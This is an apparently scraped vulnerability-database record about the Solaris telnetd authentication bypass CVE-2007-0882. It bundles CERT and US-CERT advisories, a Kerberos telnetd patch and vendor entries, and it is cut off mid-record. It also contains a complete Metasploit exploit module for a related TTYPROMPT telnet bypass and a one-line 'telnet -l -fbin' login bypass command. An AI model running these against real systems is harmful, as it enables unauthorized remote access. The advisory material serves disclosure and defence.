In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`.\n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact \n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution \n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet`**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. 
\n--- \n \n### Vendor Information\n\n881872\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Sun Microsystems, Inc. \n\nNotified: February 12, 2007 Updated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23881872 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * 
<http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope. \n\nThis document was written by Art Manion and Chris Taschner. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>) \n---|--- \n**Severity Metric:** | 67.50 \n**Date Public:** | 2007-02-10 \n**Date First Published:** | 2007-02-12 \n**Date Last Updated:** | 2008-07-21 18:13 UTC \n**Document Revision:** | 75 \n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T18:13:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.ietf.org/rfc/rfc1572.txt", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://secunia.com/advisories/24166/", "http://securitytracker.com/alerts/2007/Feb/1017625.html", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/"], "cvelist": ["CVE-2007-0882"], "lastseen": "2018-12-25T20:18:56", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}, {"type": "osvdb", "idList": ["OSVDB:31881"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16220", 
"SECURITYVULNS:VULN:7211", "SECURITYVULNS:DOC:16558"]}, {"type": "seebug", "idList": ["SSV:18010"]}, {"type": "exploitdb", "idList": ["EDB-ID:3293", "EDB-ID:16328", "EDB-ID:9918"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82328"]}, {"type": "saint", "idList": ["SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0", "SAINT:F83AF66562E2301032ED9A730B8E80E0", "SAINT:DA3D62A8F297274BAB795DE91F7D7F28"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/TELNET/FUSER"]}, {"type": "nessus", "idList": ["SOLARIS10_X86_120069.NASL", "SOLARIS10_TELNET_ENV.NASL", "SOLARIS10_120068.NASL"]}, {"type": "canvas", "idList": ["SOLARIS_TELNET"]}], "modified": "2018-12-25T20:18:56"}}, "objectVersion": "1.4"}, "lastseen": "2018-12-25T20:18:56", "differentElements": ["description"], "edition": 4}], "viewCount": 29, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-10-09T19:50:57"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}, {"type": "saint", "idList": ["SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0", "SAINT:DA3D62A8F297274BAB795DE91F7D7F28", "SAINT:F83AF66562E2301032ED9A730B8E80E0"]}, {"type": "exploitdb", "idList": ["EDB-ID:9918", "EDB-ID:16328", "EDB-ID:3293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82328"]}, {"type": "nessus", "idList": ["SOLARIS10_X86_120069.NASL", "SOLARIS10_TELNET_ENV.NASL", "SOLARIS10_120068.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16220", "SECURITYVULNS:VULN:7211", "SECURITYVULNS:DOC:16558"]}, {"type": "seebug", "idList": ["SSV:18010"]}, {"type": "canvas", "idList": ["SOLARIS_TELNET"]}, {"type": "osvdb", "idList": ["OSVDB:31881"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/TELNET/FUSER"]}], "modified": "2019-10-09T19:50:57"}, "vulnersScore": 8.4}, "objectVersion": "1.4", "_object_type": "robots.models.cert.CertBulletin", "_object_types": ["robots.models.cert.CertBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client \"-f\" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-0882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "published": "2007-02-12T20:28:00", "title": "CVE-2007-0882", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T17:19:22", "bulletinFamily": "exploit", "description": "**Name**| solaris_telnet \n---|--- \n**CVE**| CVE-2007-0882 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| solaris_telnet \n**Notes**| References: ['http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1', 'http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit', 'http://blogs.zdnet.com/security/?p=31', 'http://www.milw0rm.com/exploits/3293'] \nCVE Name: CVE-2007-0882 \nVENDOR: Sun \nDate public: 02/10/2007 \nCERT Advisory: http://www.kb.cert.org/vuls/id/881872 \nUsage: Set username bin, with no password. Then use bin2root.sh to get full root privileges. 
\nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882 \nCVSS: 10.0 \n\n", "modified": "2007-02-12T20:28:00", "published": "2007-02-12T20:28:00", "id": "SOLARIS_TELNET", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/solaris_telnet", "type": "canvas", "title": "Immunity Canvas: SOLARIS_TELNET", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T22:39:41", "bulletinFamily": "exploit", "description": "<p>Vulnerability description: Solaris is a commercial UNIX operating system developed and maintained by Sun. The TELNET service in Solaris 10 has a vulnerability in its handling of malformed authentication data, which a remote attacker may exploit to bypass authentication and gain access. The Solaris 10 telnet daemon passes malformed arguments that a user may submit directly to the login process without checking them, and the login process consequently performs an unintended switch of user identity. This may allow a user to log in to the system without a password with the privileges of certain privileged users and gain full access to the system; if the system does not restrict where the root user may log in from, gaining root access is also possible.</p><p>CVE-ID: CVE-2007-0882</p><p>CNNVD-ID: CNNVD-200702-224</p><p>Official CVE link<a href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882\"><font color=\"#333333\">:</font>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882</a></p><p> 
The vendor has released an upgrade patch to fix this security issue. Patch download link: <a href=\"http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1\" rel=\"nofollow\">http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1</a> </p>", "modified": "2002-01-18T00:00:00", "published": "2002-01-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18010", "id": "SSV:18010", "title": "Solaris in.telnetd TTYPROMPT Buffer Overflow", "type": "seebug", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module uses a buffer overflow in the Solaris 'login'\r\n\t\t\tapplication to bypass authentication in the telnet daemon. 
\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC', 'cazz' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2001-0797'],\r\n\t\t\t\t\t[ 'OSVDB', '690'],\r\n\t\t\t\t\t[ 'BID', '5531'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 18 2002',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, "The username to use", "bin" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\r\n\t\tbanner = sock.get_once\r\n\t\t\r\n\t\tprint_status('Setting TTYPROMPT...')\r\n\t\t\r\n\t\treq = \r\n\t\t\t"\\xff\\xfc\\x18" +\r\n\t\t\t"\\xff\\xfc\\x1f" +\r\n\t\t\t"\\xff\\xfc\\x21" +\r\n\t\t\t"\\xff\\xfc\\x23" +\r\n\t\t\t"\\xff\\xfb\\x22" +\r\n\t\t\t"\\xff\\xfc\\x24" +\r\n\t\t\t"\\xff\\xfb\\x27" +\r\n\t\t\t"\\xff\\xfb\\x00" +\r\n\t\t\t"\\xff\\xfa\\x27\\x00" +\r\n\t\t\t"\\x00TTYPROMPT" +\r\n\t\t\t"\\x01" + \r\n\t\t\trand_text_alphanumeric(6) + \r\n\t\t\t"\\xff\\xf0"\t\r\n\t\t\r\n\t\tsock.put(req)\r\n\t\tsleep(0.25)\r\n\t\t\r\n\t\tprint_status('Sending username...')\r\n\t\r\n\t\tfiller = rand_text_alpha(rand(10) + 1)\r\n \r\n\t\treq << datastore['USER'] + (" #{filler}" * 65) \r\n\t\t\r\n\t\tsock.put(req + "\\n\\n\\n")\r\n\r\n\t\tsleep(0.25)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\tsock.put(payload.encoded + "\\n")\r\n\r\n\t\tsleep(0.25)\r\n\t\t\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\n ", "cvss": {"score": 
10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18010"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA07-059A\r\n\r\n\r\nSun Solaris Telnet Worm\r\n\r\n Original release date: February 28, 2007\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Sun Solaris 10 (SunOS 5.10)\r\n * Sun "Nevada" (SunOS 5.11)\r\n\r\n Both SPARC and Intel (x86) architectures are affected.\r\n\r\n\r\nOverview\r\n\r\n A worm is exploiting a vulnerability (VU#881872) in the Sun Solaris\r\n telnet daemon (in.telnetd).\r\n\r\n\r\nI. Description\r\n\r\n A worm is exploiting a vulnerability in the telnet daemon\r\n (in.telnetd) on unpatched Sun Solaris systems. The vulnerability\r\n allows the worm (or any attacker) to log in via telnet (23/tcp)\r\n with elevated privileges. 
Further details about the vulnerability\r\n are available in Vulnerability Note VU#881872 (CVE-2007-0882).\r\n\r\n Because VU#881872 is trivial to exploit and sufficient technical\r\n detail is publicly available, any attacker, not just this worm,\r\n could exploit vulnerable systems.\r\n\r\n Characteristics of the worm include, but are not limited to:\r\n \r\n * Exploiting VU#881872 to log in via telnet as the users adm or lp\r\n * Changing permissions on /var/adm/wtmpx to -rw-r--rw-\r\n * Creating the directory .adm in /var/adm/sa/\r\n * Adding .profile files to /var/adm/ and /var/spool/lp/\r\n * Installing an authenticated backdoor shell on port 32982/tcp\r\n * Modifying crontab entries for the users adm and lp\r\n * Scanning for other hosts running telnet (23/tcp)\r\n\r\n Sun has published information about the worm in the Security Sun\r\n Alert Feed including an inoculation script that disables the telnet\r\n daemon and reverses known changes made by the worm.\r\n\r\n\r\nII. Impact\r\n\r\n VU#881872 allows a remote attacker to log on to a vulnerable system\r\n via telnet and gain elevated privileges. The worm exploits this\r\n vulnerability to compromise systems as described above. Since the\r\n worm installs a backdoor shell, it is possible for an attacker with\r\n knowledge of the authentication tokens to access a compromised\r\n system and take any action with the privileges of the backdoor\r\n shell process, likely adm or lp.\r\n\r\n\r\nIII. Solution\r\n\r\nApply a patch\r\n\r\n To address VU#881872, apply the appropriate patches referenced in\r\n Sun Alert Notification 102802.\r\n\r\nRun inoculation script\r\n\r\n To recover compromised systems, Sun has provided an inoculation script\r\n that disables the telnet daemon and reverses known changes made by the\r\n worm.\r\n\r\n Note that the inoculation script only recovers from this particular\r\n worm. Running the inoculation script does not guarantee system\r\n integrity. 
A vulnerable system may be compromised in different ways\r\n by attackers exploiting VU#881872 or using the backdoor installed\r\n by the worm. To fully recover, it may be necessary to rebuild a\r\n compromised system using trusted software sources. For more\r\n information, see Recovering from an Incident.\r\n\r\n\r\nIV. Workarounds\r\n\r\n Until the appropriate patches can be applied, consider the\r\n following workarounds.\r\n\r\nDisable telnet\r\n\r\n Telnet can be disabled by issuing the following command as root:\r\n\r\n # /usr/sbin/svcadm disable telnet\r\n\r\nRestrict telnet access\r\n\r\n Restrict access to telnet (23/tcp) from untrusted networks such as\r\n the Internet.\r\n\r\nUse SSH instead of telnet\r\n\r\n SSH provides a comparatively more secure method for remotely\r\n logging into a system than telnet. As general advice, we recommend\r\n using SSH rather than telnet.\r\n\r\n\r\nV. References\r\n\r\n * US-CERT Vulnerability Note VU#881872 -\r\n <http://www.kb.cert.org/vuls/id/881872>\r\n\r\n * Recovering from an Incident -\r\n <http://www.cert.org/nav/recovering.html>\r\n\r\n * Sun Alert Notification 102802 -\r\n <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\r\n\r\n * Solaris in.telnetd worm seen in the wild + inoculation script -\r\n <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\r\n\r\n * inoculate.local -\r\n <http://blogs.sun.com/security/resource/inoculate.local>\r\n\r\n * CVE-2007-0882 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA07-059A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. 
Please send\r\n email to <cert@cert.org> with "TA07-059A Feedback VU#881872" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2007 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n February 28, 2007: Initial release\r\n", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "SECURITYVULNS:DOC:16220", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16220", "title": "US-CERT Technical Cyber Security Alert TA07-059A -- Sun Solaris Telnet Worm", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "User's password is not checked in telnet session if F flag is set. On older versions defining TTYPROMPT variable allows unauthorized access with bin group privileges. 
Vulnerability is used by internet worm.", "modified": "2007-03-01T00:00:00", "published": "2007-03-01T00:00:00", "id": "SECURITYVULNS:VULN:7211", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7211", "title": "Sun Solaris unauthorized access", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n MIT krb5 Security Advisory 2007-001\r\n\r\nOriginal release: 2007-04-03\r\nLast update: 2007-04-03\r\n\r\nTopic: telnetd allows login as arbitrary user\r\n\r\nSeverity: CRITICAL\r\n\r\nCVE: CVE-2007-0956\r\nCERT: VU#220816\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe MIT krb5 telnet daemon (telnetd) allows unauthorized login as an\r\narbitrary user, when presented with a specially crafted username.\r\nExploitation of this vulnerability is trivial.\r\n\r\nThis is a vulnerability in an application program; it is not a bug in\r\nthe MIT krb5 libraries or in the Kerberos protocol.\r\n\r\nIMPACT\r\n======\r\n\r\nA user can gain unauthorized access to any account (including root) on\r\na host running telnetd. 
Whether the attacker needs to authenticate\r\ndepends on the configuration of telnetd on that host.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* telnetd in all releases of MIT krb5, up to and including krb5-1.6\r\n\r\nFIXES\r\n=====\r\n\r\n* The upcoming krb5-1.6.1 release will contain a fix for this\r\n vulnerability.\r\n\r\nPrior to that release you may:\r\n\r\n* disable telnetd\r\n\r\nor\r\n\r\n* apply the patch\r\n\r\n This patch is also available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-001-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2007-001-patch.txt.asc\r\n\r\n*** src/appl/telnet/telnetd/state.c (revision 19480)\r\n- --- src/appl/telnet/telnetd/state.c (local)\r\n***************\r\n*** 1665,1671 ****\r\n strcmp(varp, "RESOLV_HOST_CONF") && /* linux */\r\n strcmp(varp, "NLSPATH") && /* locale stuff */\r\n strncmp(varp, "LC_", strlen("LC_")) && /* locale stuff */\r\n! strcmp(varp, "IFS")) {\r\n return 1;\r\n } else {\r\n syslog(LOG_INFO, "Rejected the attempt to modify the environment variable \"%s\"", varp);\r\n- --- 1665,1672 ----\r\n strcmp(varp, "RESOLV_HOST_CONF") && /* linux */\r\n strcmp(varp, "NLSPATH") && /* locale stuff */\r\n strncmp(varp, "LC_", strlen("LC_")) && /* locale stuff */\r\n! strcmp(varp, "IFS") &&\r\n! !strchr(varp, '-')) {\r\n return 1;\r\n } else {\r\n syslog(LOG_INFO, "Rejected the attempt to modify the environment variable \"%s\"", varp);\r\n*** src/appl/telnet/telnetd/sys_term.c (revision 19480)\r\n- --- src/appl/telnet/telnetd/sys_term.c (local)\r\n***************\r\n*** 1287,1292 ****\r\n- --- 1287,1302 ----\r\n #endif\r\n #if defined (AUTHENTICATION)\r\n if (auth_level >= 0 && autologin == AUTH_VALID) {\r\n+ if (name[0] == '-') {\r\n+ /* Authenticated and authorized to log in to an\r\n+ account starting with '-'? Even if that\r\n+ unlikely case comes to pass, the current login\r\n+ program will not parse the resulting command\r\n+ line properly. 
*/\r\n+ syslog(LOG_ERR, "user name cannot start with '-'");\r\n+ fatal(net, "user name cannot start with '-'");\r\n+ exit(1);\r\n+ }\r\n # if !defined(NO_LOGIN_F)\r\n #if defined(LOGIN_CAP_F)\r\n argv = addarg(argv, "-F");\r\n***************\r\n*** 1377,1387 ****\r\n } else\r\n #endif\r\n if (getenv("USER")) {\r\n! argv = addarg(argv, getenv("USER"));\r\n #if defined(LOGIN_ARGS) && defined(NO_LOGIN_P)\r\n {\r\n register char **cpp;\r\n for (cpp = environ; *cpp; cpp++)\r\n argv = addarg(argv, *cpp);\r\n }\r\n #endif\r\n- --- 1387,1405 ----\r\n } else\r\n #endif\r\n if (getenv("USER")) {\r\n! char *user = getenv("USER");\r\n! if (user[0] == '-') {\r\n! /* "telnet -l-x ..." */\r\n! syslog(LOG_ERR, "user name cannot start with '-'");\r\n! fatal(net, "user name cannot start with '-'");\r\n! exit(1);\r\n! }\r\n! argv = addarg(argv, user);\r\n #if defined(LOGIN_ARGS) && defined(NO_LOGIN_P)\r\n {\r\n register char **cpp;\r\n for (cpp = environ; *cpp; cpp++)\r\n+ if ((*cpp)[0] != '-')\r\n argv = addarg(argv, *cpp);\r\n }\r\n #endif\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVE: CVE-2007-0956\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0956\r\n\r\nCERT: VU#220816\r\nhttp://www.kb.cert.org/vuls/id/220816\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThis vulnerability was found when attempting to confirm the absence of\r\na related vulnerability in the Solaris telnetd. [CVE-2007-0882]\r\n\r\nDETAILS\r\n=======\r\n\r\nThe MIT krb5 telnet daemon fails to adequately check the provided\r\nusername. 
A malformed username beginning with "-e" can be interpreted\r\nas a command-line flag by the login.krb5 program, which is executed by\r\ntelnetd. This causes login.krb5 to execute part of the BSD rlogin\r\nprotocol, where an arbitrary username may be injected, allowing login\r\nas that user without a password or any further authentication.\r\n\r\nIf the telnet daemon is configured to only permit authenticated login,\r\nthen only authenticated users can exploit this vulnerability.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2007-04-03 original release\r\n\r\nCopyright (C) 2007 Massachusetts Institute of Technology\r\n", "modified": "2007-04-04T00:00:00", "published": "2007-04-04T00:00:00", "id": "SECURITYVULNS:DOC:16558", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16558", "title": "MITKRB5-SA-2007-001: telnetd allows login as arbitrary user [CVE-2007-0956]", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "## Vulnerability Description\nSolaris contains a flaw that may allow a malicious user to log in as an arbitrary user. The issue is triggered when a specified command-line option is provided to the in.telnetd daemon. It is possible that the flaw may allow unauthorized login resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. 
However, Sun has released a patch to address this vulnerability.\n## Short Description\nSolaris 10 Forced Login in.telnetd Authentication Bypass\n## Manual Testing Notes\n$ telnet -l \"-fbin\" [target]\n## References:\nVendor Specific Solution URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1\nSecurity Tracker: 1017625\n[Secunia Advisory ID:24120](https://secuniaresearch.flexerasoftware.com/advisories/24120/)\n[Related OSVDB ID: 1007](https://vulners.com/osvdb/OSVDB:1007)\nOther Advisory URL: http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf\nOther Advisory URL: http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html\nNews Article: http://www.theregister.co.uk/2007/03/01/solaris_security_worm/\nNews Article: http://news.com.com/Suns+Solaris+10+at+risk+of+zero-day+exploit/2100-1002_3-6158955.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0252.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0254.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0256.html\nMail List Post: http://whitestar.linuxbox.org/pipermail/exploits/2007-February/000097.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-02/0218.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0231.html\nISS X-Force ID: 32434\nGeneric Informational URL: http://isc.sans.org/diary.html?storyid=2220\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3293\nFrSIRT Advisory: ADV-2007-0560\n[CVE-2007-0882](https://vulners.com/cve/CVE-2007-0882)\nCERT VU: 881872\nBugtraq ID: 22512\n", "modified": "2007-02-10T13:45:33", "published": "2007-02-10T13:45:33", "href": "https://vulners.com/osvdb/OSVDB:31881", "id": "OSVDB:31881", "title": "Solaris Forced Login in.telnetd Authentication Bypass", "type": "osvdb", "cvss": {"score": 10.0, "vector": 
